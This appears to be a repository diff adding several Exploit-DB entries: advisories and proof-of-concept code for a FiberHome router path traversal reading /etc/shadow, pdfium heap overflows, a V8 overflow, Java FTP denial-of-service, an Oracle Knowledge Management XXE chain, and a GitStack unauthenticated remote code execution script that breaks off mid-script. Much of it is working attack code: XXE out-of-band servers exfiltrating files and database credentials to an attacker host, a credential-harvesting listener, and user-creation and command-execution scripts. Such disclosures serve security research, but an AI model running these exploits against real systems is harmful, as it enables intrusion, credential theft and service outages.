bsXmSrtq1qr9tmC7CBrWqN8PDo9Cma/PyeHIuJ6nZNq6kdrw3qeT300vgRPJlflroyZYczFmjxN3
nRjrlPyrKql9XcvMYb6p+JOwXFwFj4mJfGZHGUjMAUGpW9o4L+EnOcBlMGLCBhUi6Flc/PT2zneR
77SnL1Hg2uPbmLYlaWLfUbi80cPR1DrtVOtp9F6Py7rL/w3Oa0GMJt/Z+yto5ue0vz5H3LX7lDR5
b/GNNsd3q5YzOG2Xv/c//F3JFOFCQqjmsVg=
"""
```

27
exploits/linux/webapps/44054.md Normal file
View file

@ -0,0 +1,27 @@
## Vulnerability Summary
The following advisory describes a directory traversal vulnerability found in FiberHome routers.
FiberHome Technologies Group “was established in 1974. After continuous and intensive development for over 40 years, its business has been extended to R&D, manufacturing, marketing & sales, engineering service, in 4 major areas: fiber-optic communications, data networking communications, wireless communication, and intelligentizing applications. In particular, it has been providing end-to- end solutions integrated with opto-electronic devices, opticpreforms, fiber & cables, and optical communication systems to many countries around the world.”
## Credit
An independent security researcher has reported this vulnerability to Beyond Securitys SecuriTeam Secure Disclosure program.
## Vendor response
Update 1:
Cve issued: CVE-2017-15647
We tried to contact FiberHome since September 6 2017, repeated attempts to establish contact went unanswered. At this time there is no solution or workaround for the vulnerability.
## Vulnerability details
User controlled input is not sufficiently sanitized when passed to /cgi-bin/webproc.
/cgi-bin/webproc receives getpage= as parameter input.
When we pass the directory of a file as a parameter input with parameter var:page, we will get the file from the router.
## Proof of Concept
```
http://+IP+ /cgi-bin/webproc?getpage=/etc/shadow&var:language=en_us&var:page=wizardfifth
```

220
exploits/multiple/dos/44082.txt Normal file
View file

@ -0,0 +1,220 @@
This vulnerability relies on several minor oversights in the handling of shading patterns in pdfium, I'll try to detail all of the issues that could be fixed to harden the code against similar issues.
The DrawXShading functions in cpdf_renderstatus.cpp rely on a helper function to compute the number of output components resulting from applying multiple shading functions. Note that all of these functions appear to be vulnerable; the rest of this report discusses the specifics of triggering a heap-overflow using DrawRadialShading.
uint32_t CountOutputs(
const std::vector<std::unique_ptr<CPDF_Function>>& funcs) {
uint32_t total = 0;
for (const auto& func : funcs) {
if (func)
total += func->CountOutputs(); // <-- Issue #1 : integer overflow here
}
return total;
}
The lack of integer overflow checking would not be an issue if the parser enforced the limitations applied by the pdf specification to the functions applied (namely that the /Function section in a radial shading pattern should be either a 1-n function or an array of n 1-1 functions), as these preconditions would preclude any overflow from occuring. However, we can see in the loading code for CPDF_ShadingPattern that there is no such validation.
bool CPDF_ShadingPattern::Load() {
if (m_ShadingType != kInvalidShading)
return true;
CPDF_Dictionary* pShadingDict =
m_pShadingObj ? m_pShadingObj->GetDict() : nullptr;
if (!pShadingDict)
return false;
m_pFunctions.clear();
CPDF_Object* pFunc = pShadingDict->GetDirectObjectFor("Function");
if (pFunc) {
// Issue #2: we never validate that the signatures of the parsed Function object
// match the expected signatures for the shading type that we're parsing.
if (CPDF_Array* pArray = pFunc->AsArray()) {
m_pFunctions.resize(std::min<size_t>(pArray->GetCount(), 4));
for (size_t i = 0; i < m_pFunctions.size(); ++i)
m_pFunctions[i] = CPDF_Function::Load(pArray->GetDirectObjectAt(i));
} else {
m_pFunctions.push_back(CPDF_Function::Load(pFunc));
}
}
CPDF_Object* pCSObj = pShadingDict->GetDirectObjectFor("ColorSpace");
if (!pCSObj)
return false;
CPDF_DocPageData* pDocPageData = document()->GetPageData();
m_pCS = pDocPageData->GetColorSpace(pCSObj, nullptr);
if (m_pCS)
m_pCountedCS = pDocPageData->FindColorSpacePtr(m_pCS->GetArray());
m_ShadingType = ToShadingType(pShadingDict->GetIntegerFor("ShadingType"));
// We expect to have a stream if our shading type is a mesh.
if (IsMeshShading() && !ToStream(m_pShadingObj.Get()))
return false;
return true;
}
Assuming that we can create function objects with very large output sizes, we can then reach the following code (in cpdf_renderstatus.cpp) when rendering something using the pattern:
void DrawRadialShading(const RetainPtr<CFX_DIBitmap>& pBitmap,
CFX_Matrix* pObject2Bitmap,
CPDF_Dictionary* pDict,
const std::vector<std::unique_ptr<CPDF_Function>>& funcs,
CPDF_ColorSpace* pCS,
int alpha) {
// ... snip ...
uint32_t total_results =
std::max(CountOutputs(funcs), pCS->CountComponents());
// NB: CountOutputs overflows here, result_array will be a stack buffer if we return
// a resulting size less than 16) or a heap buffer if the size is larger.
CFX_FixedBufGrow<float, 16> result_array(total_results);
float* pResults = result_array;
memset(pResults, 0, total_results * sizeof(float));
uint32_t rgb_array[SHADING_STEPS];
for (int i = 0; i < SHADING_STEPS; i++) {
float input = (t_max - t_min) * i / SHADING_STEPS + t_min;
int offset = 0;
for (const auto& func : funcs) {
if (func) {
int nresults;
// Here we've desynchronised the size of the memory pointed to by
// pResults with the actual output size of the functions, so this
// can write outside the allocated buffer.
if (func->Call(&input, 1, pResults + offset, &nresults))
offset += nresults;
}
}
float R = 0.0f;
float G = 0.0f;
float B = 0.0f;
pCS->GetRGB(pResults, &R, &G, &B);
rgb_array[i] =
FXARGB_TODIB(FXARGB_MAKE(alpha, FXSYS_round(R * 255),
FXSYS_round(G * 255), FXSYS_round(B * 255)));
}
Now we need to revisit our earlier assumption, that we can create function objects with large output sizes.
The following code handles parsing of function objects:
bool CPDF_Function::Init(CPDF_Object* pObj) {
CPDF_Stream* pStream = pObj->AsStream();
CPDF_Dictionary* pDict = pStream ? pStream->GetDict() : pObj->AsDictionary();
CPDF_Array* pDomains = pDict->GetArrayFor("Domain");
if (!pDomains)
return false;
m_nInputs = pDomains->GetCount() / 2;
if (m_nInputs == 0)
return false;
m_pDomains = FX_Alloc2D(float, m_nInputs, 2);
for (uint32_t i = 0; i < m_nInputs * 2; i++) {
m_pDomains[i] = pDomains->GetFloatAt(i);
}
CPDF_Array* pRanges = pDict->GetArrayFor("Range");
m_nOutputs = 0;
if (pRanges) {
m_nOutputs = pRanges->GetCount() / 2;
m_pRanges = FX_Alloc2D(float, m_nOutputs, 2); // <-- avoid this call
for (uint32_t i = 0; i < m_nOutputs * 2; i++)
m_pRanges[i] = pRanges->GetFloatAt(i);
}
uint32_t old_outputs = m_nOutputs;
if (!v_Init(pObj))
return false;
if (m_pRanges && m_nOutputs > old_outputs) {
m_pRanges = FX_Realloc(float, m_pRanges, m_nOutputs * 2); // <-- avoid this call
if (m_pRanges) {
memset(m_pRanges + (old_outputs * 2), 0,
sizeof(float) * (m_nOutputs - old_outputs) * 2);
}
}
return true;
}
We can only have 4 functions, so we need m_nOutputs to be pretty large. Ideally we also don't want our pdf file to contain arrays of size 0x100000000 // 4 either, since this will mean multiple-gigabyte pdfs. Note also that any call to the FX_ allocation functions will fail on very large values, so ideally we need to follow the case old_outputs == m_nOutputs == 0, avoiding the final FX_Realloc call and allowing an arbitrarily large m_nOutputs.
It turns out that there is a function subtype that allows this, the exponential interpolation function type implemented in cpdf_expintfunc.cpp
bool CPDF_ExpIntFunc::v_Init(CPDF_Object* pObj) {
CPDF_Dictionary* pDict = pObj->GetDict();
if (!pDict)
return false;
CPDF_Array* pArray0 = pDict->GetArrayFor("C0");
if (m_nOutputs == 0) {
m_nOutputs = 1;
if (pArray0) {
fprintf(stderr, "C0 %zu\n", pArray0->GetCount());
m_nOutputs = pArray0->GetCount();
}
}
CPDF_Array* pArray1 = pDict->GetArrayFor("C1");
m_pBeginValues = FX_Alloc2D(float, m_nOutputs, 2);
m_pEndValues = FX_Alloc2D(float, m_nOutputs, 2);
for (uint32_t i = 0; i < m_nOutputs; i++) {
m_pBeginValues[i] = pArray0 ? pArray0->GetFloatAt(i) : 0.0f;
m_pEndValues[i] = pArray1 ? pArray1->GetFloatAt(i) : 1.0f;
}
m_Exponent = pDict->GetFloatFor("N");
m_nOrigOutputs = m_nOutputs;
if (m_nOutputs && m_nInputs > INT_MAX / m_nOutputs) // <-- can't be *too* large
return false;
m_nOutputs *= m_nInputs; // <-- but it can be pretty large
// Issue #3: This is probably not the place, but it probably makes sense to
// bound m_nInputs and m_nOutputs to some large-but-not-that-large value in
// CPDF_Function::Init
return true;
}
So, by providing a function object without a /Range object, but with a large /C0 and /Domain elements, we can construct a function object with about INT_MAX outputs.
7 0 obj
<<
/FunctionType 2
/Domain [
0.0 1.0
... repeat many times ...
0.0 1.0
]
/C0 [
0.0
... repeat many times ...
0.0
]
/N 1
>>
endobj
At this point it looks like we have quite an annoying exploitation primitive; we can write a huge amount of data out of bounds, but that data will be calculated as an interpolation between it's input coordinates, and it will be a really, really big memory corruption.
It turns out that the point mentioned earlier at Issue #2 about validating the signatures of the functions is again relevant here, since if we look at the callsite in DrawRadialShading we can see that all of the functions are called with a single input parameter, and if we look at the start of CPDF_Function::Call
bool CPDF_Function::Call(float* inputs,
uint32_t ninputs,
float* results,
int* nresults) const {
if (m_nInputs != ninputs)
return false;
We can see that any attempt to call a function with the wrong number of input parameters will simply fail, letting us control precisely the size and contents of our overflow.
The attached poc will crash under ASAN with the following stack-trace, and without ASAN during the free of the corrupted heap block.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44082.zip

65
exploits/multiple/dos/44083.txt Normal file
View file

@ -0,0 +1,65 @@
Related to issue 1490 .
When parsing ShadingPatterns; according to the specification they shouldn't be permitted to have a pattern colorspace as their base colorspace, but this is not validated, leading to out-of-bounds reads when rendering using the malformed shading pattern.
bool CPDF_ShadingPattern::Load() {
// ... snip ...
CPDF_Object* pCSObj = pShadingDict->GetDirectObjectFor("ColorSpace");
if (!pCSObj)
return false;
// No validation here on the type of colorspace.
// ... snip ...
return true;
}
If we now look at the code called during rendering of this pattern, we call through DrawFreeGouraudShading (cpdf_renderstatus.cpp), which will call CPDF_MeshStream::ReadVertex for each vertex in the shading pattern, which will call CPDF_MeshStream::ReadColor.
std::tuple<float, float, float> CPDF_MeshStream::ReadColor() {
ASSERT(ShouldCheckBPC(m_type));
float color_value[kMaxComponents];
for (uint32_t i = 0; i < m_nComponents; ++i) {
color_value[i] = m_ColorMin[i] + m_BitStream->GetBits(m_nComponentBits) *
(m_ColorMax[i] - m_ColorMin[i]) /
m_ComponentMax;
}
// NB: color_value has only been initialised for the first m_nComponents elements
float r = 0.0;
float g = 0.0;
float b = 0.0;
if (m_funcs.empty()) {
m_pCS->GetRGB(color_value, &r, &g, &b); // <-- we're interested in this call here
return std::tuple<float, float, float>(r, g, b);
}
// ... snip ...
}
This call to GetRGB will be into the pattern cs
bool CPDF_PatternCS::GetRGB(float* pBuf, float* R, float* G, float* B) const {
if (m_pBaseCS) {
ASSERT(m_pBaseCS->GetFamily() != PDFCS_PATTERN);
PatternValue* pvalue = (PatternValue*)pBuf;
// pvalue->m_Comps is now pointing 5 dwords into an 8 dword sized buffer, and p_pBaseCS expects to be able to read 8 dwords from it.
if (m_pBaseCS->GetRGB(pvalue->m_Comps, R, G, B))
return true;
}
*R = 0.75f;
*G = 0.75f;
*B = 0.75f;
return false;
}
Originally reported without 90 day deadline as https://bugs.chromium.org/p/chromium/issues/detail?id=795251, since it wasn't clear that there was an easy way to use the oob-read to leak information in a way that was useful, deadline applied as of 15/12 after working out how to use this as an information leak for issue 1489 .
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44083.zip

39
exploits/multiple/dos/44084.js Normal file
View file

@ -0,0 +1,39 @@
/*
Here's a snippet of the method.
ASSIGN_RETURN_FAILURE_ON_EXCEPTION(
isolate, captures_length_obj,
Object::ToLength(isolate, captures_length_obj));
const int captures_length = PositiveNumberToUint32(*captures_length_obj);
...
if (functional_replace) {
const int argc =
has_named_captures ? captures_length + 3 : captures_length + 2; <<-- (a)
ScopedVector<Handle<Object>> argv(argc);
int cursor = 0;
for (int j = 0; j < captures_length; j++) {
argv[cursor++] = captures[j];
}
// (b)
argv[cursor++] = handle(Smi::FromInt(position), isolate);
argv[cursor++] = string;
The variable "captures_length" can be controlled by the user, so an integer overflow may occur at (a) which causes a heap overflow at (b).
PoC:
*/
let cnt = 0;
let reg = /./g;
reg.exec = () => {
if (cnt++ == 0)
return {length: 0xfffffffe};
cnt = 0;
return null;
};
''.replace(reg, () => {});

227
exploits/multiple/webapps/44041.txt Normal file
View file

@ -0,0 +1,227 @@
# SSD Advisory Oracle Knowledge Management XXE Leading to a RCE
## Vulnerability Summary
The following advisory describe Information Disclosure found in Oracle Knowledge Management version 8.5.1.
By enabling searches across a wide variety of sources, Oracle's InQuira knowledge management products offer simple and convenient ways for users to access knowledge that was once hidden in the myriad systems, applications, and databases used to store enterprise content.
Oracle's products for knowledge management help users find useful knowledge contained in corporate information stores.
## Credit
An independent security researcher, Steven Seeley, has reported this vulnerability to Beyond Security's SecuriTeam Secure Disclosure program.
## Vendor response
Oracle has released patches to address this vulnerability, for more details see: http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html.
## Vulnerability Details
The vulnerable code can be found in /imws/Result.jsp which when calls, can be used to access an XML from a third-party server, this third-party server which can be under our control can be used to reference files locally present on the victim's server.
## Proof of Concept
To exploit the vulnerability, we will run the following 5 steps (the first 2 need to be run in the background):
- 'Malicious' XML External Entity (XXE) server
- Listener for the gopher protocol
- Attacker who steal the 'custom.xml' file
- Decrypt/crack the encrypted AES password
- Shell on the machine
- This image illustrates the steps this attack requires and the sequence of events that happen (behind the scenes):
## Step 1 setup a 'malicious' XML External Entity (XXE) server:
```
x@pluto:~/xxe$ ruby xxeserve.rb -o 0.0.0.0
[2015-02-09 16:03:45] INFO WEBrick 1.3.1
[2015-02-09 16:03:45] INFO ruby 1.9.3 (2013-11-22) [x86_64-linux]
== Sinatra/1.4.5 has taken the stage on 4567 for development with backup from WEBrick
[2015-02-09 16:03:45] INFO WEBrick::HTTPServer#start: pid=18862 port=4567
172.16.77.128 - - [09/Feb/2015:16:04:10 +1100] "GET /xml?f=C:/Oracle/Knowledge/IM/instances/InfoManager/custom.xml HTTP/1.1" 200 173 0.0089
172.16.77.128 - - [09/Feb/2015:16:04:10 AEDT] "GET /xml?f=C:/Oracle/Knowledge/IM/instances/InfoManager/custom.xml HTTP/1.1" 200 173
- -> /xml?f=C:/Oracle/Knowledge/IM/instances/InfoManager/custom.xml
```
## Step 2 setup a listener for the gopher protocol:
```
x@pluto:~/xxe$ ./gopher.py
starting up on 0.0.0.0 port 1337
waiting for a connection
connection from ('172.16.77.128', 50746)
(+) The database SID is: jdbc:oracle:thin:@WIN-U94QE7O15KE:1521:IM
(+) The database username is: SYS as SYSDBA
(+) The database password is: VO4+OdJq+LXTkmSdXgvCg37TdK9mKftuz2XFiM9mif4=
```
## Step 3 steal the 'custom.xml' file
```
x@pluto:~/xxe$ ./poc.py
(+) pulling custom.xml for the db password...
(!) Success! please check the gopher.py window!
```
## Step 4 decrypt/crack the encrypted AES password:
```
NOTE: you will need to bruteforce the encryption key which is contained in the wallet.
Oracle Knowledge uses 'OracleKnowledge1' as the wallet/keystore password, but you will most likely not have the wallet or keystore in which case a dictionary attack is to be used to find the password.
x@pluto:~/xxe$ ./decrypt.sh VO4+OdJq+LXTkmSdXgvCg37TdK9mKftuz2XFiM9mif4=
(+) Decrypting... "VO4+OdJq+LXTkmSdXgvCg37TdK9mKftuz2XFiM9mif4="
Result: "password"
```
## Step 5 get a shell
Using the database information, login to the database remotely and execute code. You may also find another configuration file on the system that will allow you a more 'direct' way to obtain a SYSTEM shell.
### xxeserve.rb
```
#!/usr/bin/env ruby
# Notes:
# - This is the out of band xxe server that is used to retrieve the file and send it via the gopher protocol
# - ruby xxeserve.rb -o 0.0.0.0
require 'sinatra'
get "/" do
return "OHAI" if params[:p].nil?
f = File.open("./files/#{request.ip}#{Time.now.to_i}","w")
f.write(params[:p])
f.close
""
end
get "/xml" do
return "" if params[:f].nil?
<<END
<!ENTITY % payl SYSTEM "file:///#{params[:f]}">
<!ENTITY % int "<!ENTITY &#37; trick SYSTEM 'gopher://#{request.host}:1337/?%payl;'>">
END
end
```
### gopher.py
```
#!/usr/bin/python
# Notes:
# - This code just listens for client requests on port 1337
# - it looks for database strings and prints them out
import socket
import sys
import re
# Create a TCP/IP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Bind the socket to the port
server_address = ('0.0.0.0', 1337)
print >>sys.stderr, 'starting up on %s port %s' % server_address
sock.bind(server_address)
# Listen for incoming connections
sock.listen(1)
while True:
# Wait for a connection
print >>sys.stderr, 'waiting for a connection'
connection, client_address = sock.accept()
try:
print >>sys.stderr, 'connection from', client_address
# Receive the data in small chunks and retransmit it
while True:
data = connection.recv(2048)
if data:
#print data
matchuser = re.search("<user>(.*)</user>", data)
matchpassword = re.search("<password>(.*)</password>", data)
matchurl = re.search("<url>(.*)</url>", data)
if matchuser and matchpassword and matchurl:
print "(+) The database SID is: %s" % matchurl.group(1)
print "(+) The database username is: %s" % matchuser.group(1)
print "(+) The database password is: %s" % matchpassword.group(1)
connection.close()
sys.exit(1)
connection.close()
sys.exit(1)
else:
print >>sys.stderr, 'no more data from', client_address
break
except Exception:
connection.close()
finally:
# Clean up the connection
connection.close()
```
### poc.py
```
#!/usr/bin/python
# Notes:
# - This code steals the C:/Oracle/Knowledge/IM/instances/InfoManager/custom.xml file via the XXE bug.
# - You need to run ruby xxeserve.rb -o 0.0.0.0 and use an interface ip for the "local xxe server"
# - The code requires a proxy server to be setup on 127.0.0.1:8080 although, this can be changed
import requests
import json
import sys
# burp, ftw
proxies = {
"http": "http://127.0.0.1:8080",
}
if len(sys.argv) < 3:
print "(+) Usage: %s [local xxe server:port] [target]" % sys.argv[0]
print "(+) Example: %s 172.16.77.1:4567 172.16.77.128" % sys.argv[0]
sys.exit(1)
localxxeserver = sys.argv[1]
target = sys.argv[2]
payload = {'method' : '2', 'inputXml': '''<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY %% remote SYSTEM "http://%s/xml?f=C:/Oracle/Knowledge/IM/instances/InfoManager/custom.xml">
%%remote;
%%int;
%%trick;]>''' % localxxeserver}
url = 'http://%s:8226/imws/Result.jsp' % target
headers = {'content-type': 'application/x-www-form-urlencoded'}
print "(+) pulling custom.xml for the db password..."
r = requests.post(url, data=payload, headers=headers, proxies=proxies)
if r.status_code == 200:
print "(!) Success! please check the gopher.py window!"
```
### decrypt.sh
```
#!/bin/sh
if [ "$#" -ne 1 ]; then
echo "(!) Usage: $0 [hash]"
else
java -classpath "infra_encryption.jar:oraclepki.jar:osdt_core.jar:osdt_cert.jar:commons-codec-1.3.jar" -DKEYSTORE_LOCATION="keystore" com.inquira.infra.security.OKResourceEncryption $1
fi
```
## CVE Details
CVE-2016-3542
## Affected Products
Oracle Knowledge Management versions 12.1.1, 12.1.2, 12.1.3, 12.2.3, 12.2.4, and 12.2.5.

444
exploits/php/dos/44057.md Normal file
View file

@ -0,0 +1,444 @@
## Vulnerabilities Summary
The following advisory describes two (2) vulnerabilities found in Oracle Java JDK/JRE (1.8.0.131 and previous versions) packages and Apache Xerces (2.11.0)
The vulnerabilities are:
Oracle JDK/JRE Concurrency-Related Denial of Service
java.net.URLConnection (with no setConnectTimeout) Concurrency-Related Denial of Service
## Credit
An independent security researcher has reported this vulnerability to Beyond Securitys SecuriTeam Secure Disclosure program
## Vendor response
Update 1: Oracle has released patches to address this vulnerability and assigned CVE-2017-10355
Oracle acknowledged receiving the report, and has assigned it a tracking number: S0876966. We have no further information on patch availability or a workaround.
## Vulnerabilities Details
These two vulnerabilities can be triggered to cause a Denial of Service against a server, under the following conditions:
An attacker can pass an URL parameter that points to a controlled FTP server to the target
Target server uses vulnerable component(s) to fetch the resource specified by the attacker
Target server does not prevent fetching of FTP URI resources
In both vulnerabilities, the attack sequence is the following:
Attacker forces vulnerable target server to parse an FTP URL which points to an attackers controlled FTP server
Target server fetches FTP resource provided by attacker
Attackers FTP server abruptly exits, leaving the Java process on target server with two internal threads in an infinite waiting status
If the Java process is single-threaded, then it cannot further process any other client requests, reaching a Denial of Service condition with only one request from the attacker
In case of a multi-threading process, then it is possible to use the same technique and reach a Denial of Service condition of all available threads, by issuing one request for each available thread
The attackers controlled FTP server has to “abruptly” exit when the Java client will perform a RETR FTP command. This behavior is not properly handled and causes a thread concurrency Denial of Service.
For example:
require 'socket'
ftp_server = TCPServer.new 21
Thread.start do
loop do
Thread.start(ftp_server.accept) do |ftp_client|
puts "FTP. New client connected"
ftp_client.puts("220 ftp-server")
counter = 0
loop {
req = ftp_client.gets()
break if req.nil?
puts "< "+req
if req.include? "USER"
ftp_client.puts("331 password")
else
ftp_client.puts("230 Waiting data")
counter = counter + 1
if counter == 6
abort
end
end
}
puts "Aborted..."
end
end
end
loop do
sleep(50000)
end
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
require 'socket'
ftp_server = TCPServer.new 21
Thread.start do
loop do
Thread.start(ftp_server.accept) do |ftp_client|
puts "FTP. New client connected"
ftp_client.puts("220 ftp-server")
counter = 0
loop {
req = ftp_client.gets()
break if req.nil?
puts "< "+req
if req.include? "USER"
ftp_client.puts("331 password")
else
ftp_client.puts("230 Waiting data")
counter = counter + 1
if counter == 6
abort
end
end
}
puts "Aborted..."
end
end
end
loop do
sleep(50000)
end
When triggered, the DoS will result in a CLOSE_WAIT status on the connection between the target server and the FTP server (192.168.234.134), leaving the Java process thread stuck.
Oracle JDK/JRE Concurrency-Related Denial of Service
The vulnerable functions are:
java.io.InputStream
java.xml.ws.Service
javax.xml.validation.Schema
javax.xml.JAXBContext
java.net.JarURLConnection The setConnectionTimeout and setReadTimeout are ignored
javax.imageio.ImageIO
Javax.swing.ImageIcon
javax.swing.text.html.StyleSheet
## java.io.InputStream Proof of Concept
```
import java.io.InputStream;
import java.net.URL;
public class RandomAccess {
public static void main(String[] args) {
try {
//url = new URL ("ftp://maliciousftp:2121/test.xml");
URL url = new URL("ftp://maliciousftp:2121/test.xml");
InputStream inputStream = url.openStream();
inputStream.read();
//urlc.setReadTimeout(5000);
//urlc.setConnectTimeout(5000); // <- this fixes the bug
} catch (Exception e) {
e.printStackTrace();
}
}
}
```
## javax.xml.ws.Service Proof of Concept
```
import java.net.MalformedURLException;
import java.net.URL;
import javax.xml.namespace.QName;
import javax.xml.ws.Service;
public class CreateService {
public static void main(String[] args) {
String wsdlURL = "ftp://maliciousftp:2121/test?wsdl";
String namespace = "http://foo.bar.com/webservice";
String serviceName = "SomeService";
QName serviceQN = new QName(namespace, serviceName);
try {
Service service = Service.create(new URL(wsdlURL), serviceQN);
} catch (MalformedURLException e) {
e.printStackTrace();
}
}
}
```
## javax.xml.validation.Schema Proof of Concept
```
import java.net.MalformedURLException;
import java.net.URL;
import javax.xml.validation.Schema;
import javax.xml.validation.SchemaFactory;
import org.xml.sax.SAXException;
public class NSchema {
public static void main(String[] args) {
SchemaFactory schemaFactory =
SchemaFactory.newInstance("http://www.w3.org/2001/XMLSchema");
URL url;
try {
url = new URL("ftp://maliciousftp:2121/schema");
try {
Schema schemaGrammar = schemaFactory.newSchema(url);
} catch (SAXException e) {
e.printStackTrace();
}
} catch (MalformedURLException e) {
e.printStackTrace();
}
}
}
```
## javax.xml.JAXBContext Proof of Concept
```
import java.net.MalformedURLException;
import java.net.URL;
import javax.xml.bind.JAXBContext;
import javax.xml.bind.JAXBException;
import javax.xml.bind.Unmarshaller;
public class UnMarsh {
public static void main(String[] args) {
JAXBContext jaxbContext = null;
try {
jaxbContext = JAXBContext.newInstance();
} catch (JAXBException e) {
e.printStackTrace();
}
URL url = null;
try {
url = new URL("ftp://maliciousftp:2121/test");
} catch (MalformedURLException e) {
e.printStackTrace();
}
Unmarshaller jaxbUnmarshaller = null;
try {
jaxbUnmarshaller = jaxbContext.createUnmarshaller();
} catch (JAXBException e) {
e.printStackTrace();
}
try {
Object test = jaxbUnmarshaller.unmarshal(url);
} catch (JAXBException e) {
e.printStackTrace();
}
}
}
```
## java.net.JarURLConnection Proof of Concept
```
import java.io.IOException;
import java.net.JarURLConnection;
import java.net.MalformedURLException;
import java.net.URL;
import java.util.jar.Manifest;
public class JavaUrl {
public static void main(String[] args) {
URL url = null;
try {
url = new URL("jar:ftp://maliciousftp:2121/duke.jar!/");
} catch (MalformedURLException e) {
e.printStackTrace();
}
JarURLConnection jarConnection = null;
try {
jarConnection = (JarURLConnection) url.openConnection();
jarConnection.setConnectTimeout(5000);
jarConnection.setReadTimeout(5000);
} catch (IOException e1) {
e1.printStackTrace();
}
try {
Manifest manifest = jarConnection.getManifest();
} catch (IOException e) {
e.printStackTrace();
}
}
}
```
## javax.imageio.ImageIO Proof of Concept
```
import java.awt.Image;
import java.io.IOException;
import java.net.URL;
import javax.imageio.ImageIO;
import javax.swing.ImageIcon;
import javax.swing.JFrame;
import javax.swing.JLabel;
public class ImageReader {
public static void main(String[] args) {
Image image = null;
try {
URL url = new URL("ftp://maliciousftp:2121/test.jpg");
image = ImageIO.read(url);
} catch (IOException e) {
e.printStackTrace();
}
JFrame frame = new JFrame();
frame.setSize(300, 300);
JLabel label = new JLabel(new ImageIcon(image));
frame.add(label);
frame.setVisible(true);
}
}
```
## javax.swing.ImageIcon Proof of Concept
```
import java.net.MalformedURLException;
import java.net.URL;
import javax.swing.ImageIcon;
public class ImageXcon {
public static void main(String[] args) {
URL imgURL;
try {
imgURL = new URL("ftp://maliciousftp:2121/test");
String description = "";
ImageIcon icon = new ImageIcon(imgURL, description);
} catch (MalformedURLException e) {
e.printStackTrace();
}
}
}
```
## javax.swing.text.html.StyleSheet Proof of Concept
```
import java.net.MalformedURLException;
import java.net.URL;
import javax.swing.text.html.StyleSheet;
public class ImportStyla {
public static void main(String[] args) {
StyleSheet cs = new StyleSheet();
URL url;
try {
url = new URL("ftp://maliciousftp:2121/test");
cs.importStyleSheet(url);
} catch (MalformedURLException e) {
e.printStackTrace();
}
}
}
```
## java.net.URLConnection Concurrency-Related Denial of Service
A Thread Concurrency Denial of Service condition exists when java.net.URLConnection is used to fetch a file from an FTP server without specifying a Connection Timeout value.
The vulnerable functions are:
javax.xml.parsers.SAXParser
javax.xml.parsers.SAXParserFactory
org.dom4j.Document
org.dom4j.io.SAXReader
javax.xml.parsers.DocumentBuilder
javax.xml.parsers.DocumentBuilderFactory
The Root Cause Issue in Apache Xerces is the com.sun.org.apache.xerces.internal.impl.XMLEntityManager.class
In this case, XMLEntityManager.class does not explicitly set Connection Timeout for the connect object, letting Java to set a default value of -1, leading to a Denial of Service condition, as explained below.
Example of code using Apache Xerces library to fetch an XML file from an FTP server:
```
[snip]
private void parseXmlFile() {
//get the factory
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
try {
//Using factory get an instance of document builder
DocumentBuilder db = dbf.newDocumentBuilder();
//parse using builder to get DOM representation of the XML file
dom = db.parse("ftp://maliciousftpserver/test.xml"); & lt; - FTP URL controlled by the attacker
} catch (ParserConfigurationException pce) {
pce.printStackTrace();
} catch (SAXException se) {
se.printStackTrace();
} catch (IOException ioe) {
ioe.printStackTrace();
}
}
[snip]
```
## SAXParser Proof of Concept
```
SAXParserFactory factory = SAXParserFactory.newInstance();
SAXParser saxParser = factory.newSAXParser();
UserHandler userhandler = new UserHandler();
saxParser.parse("ftp://badftpserver:2121/whatever.xml”)
```
## DOM4J / SAXReader Proof of Concept
```
SAXReader reader = new SAXReader();
Document document = reader.read( "ftp://badftpserver:2121/whatever.xml" );
```
## JAVAX XML Parsers Proof of Concept
```
DocumentBuilder db = dbf.newDocumentBuilder();
dom = db.parse("ftp://badftpserver:2121/whatever.xml");
```

115
exploits/php/webapps/44044.md Normal file
View file

@ -0,0 +1,115 @@
## Vulnerability Summary
The following advisory describes an unauthenticated action that allows a remote attacker to add a user to GitStack and then used to trigger an unauthenticated remote code execution.
GitStack is “a software that lets you setup your own private Git server for Windows. This means that you create a leading edge versioning system without any prior Git knowledge. GitStack also makes it super easy to secure and keep your server up to date. GitStack is built on the top of the genuine Git for Windows and is compatible with any other Git clients. GitStack is completely free for small teams.”
## Credit
An independent security researcher, Kacper Szurek, has reported this vulnerability to Beyond Securitys SecuriTeam Secure Disclosure program.
## Vendor response
We tried to contact GitStack since October 17 2017, repeated attempts to establish contact were answered, but no details have been provided on a solution or a workaround.
CVE: CVE-2018-5955
## Vulnerability details
User controlled input is not sufficiently filtered, allowing an unauthenticated attacker can add a user to GitStack server by sending the following POST request:
```
http://IP/rest/user/
data={'username' : username, 'password' : password}
```
Once the attacker has added a user to the server, he can enable the web repository feature.
Now the attacker can create a repository from remote and disable access to our new repository for anyone else.
In the repository the attacker is allowed to upload a backdoor and use it to execute code:
## Proof of Concept
```
import requests
from requests.auth import HTTPBasicAuth
import os
import sys
ip = '192.168.15.102'
# What command you want to execute
command = "whoami"
repository = 'rce'
username = 'rce'
password = 'rce'
csrf_token = 'token'
user_list = []
print "[+] Get user list"
r = requests.get("http://{}/rest/user/".format(ip))
try:
user_list = r.json()
user_list.remove('everyone')
except:
pass
if len(user_list) > 0:
username = user_list[0]
print "[+] Found user {}".format(username)
else:
r = requests.post("http://{}/rest/user/".format(ip), data={'username' : username, 'password' : password})
print "[+] Create user"
if not "User created" in r.text and not "User already exist" in r.text:
print "[-] Cannot create user"
os._exit(0)
r = requests.get("http://{}/rest/settings/general/webinterface/".format(ip))
if "true" in r.text:
print "[+] Web repository already enabled"
else:
print "[+] Enable web repository"
r = requests.put("http://{}/rest/settings/general/webinterface/".format(ip), data='{"enabled" : "true"}')
print "r: %s" % r
if not "Web interface successfully enabled" in r.text:
print "[-] Cannot enable web interface"
os._exit(0)
print "[+] Get repositories list"
r = requests.get("http://{}/rest/repository/".format(ip))
repository_list = r.json()
if len(repository_list) > 0:
repository = repository_list[0]['name']
print "[+] Found repository {}".format(repository)
else:
print "[+] Create repository"
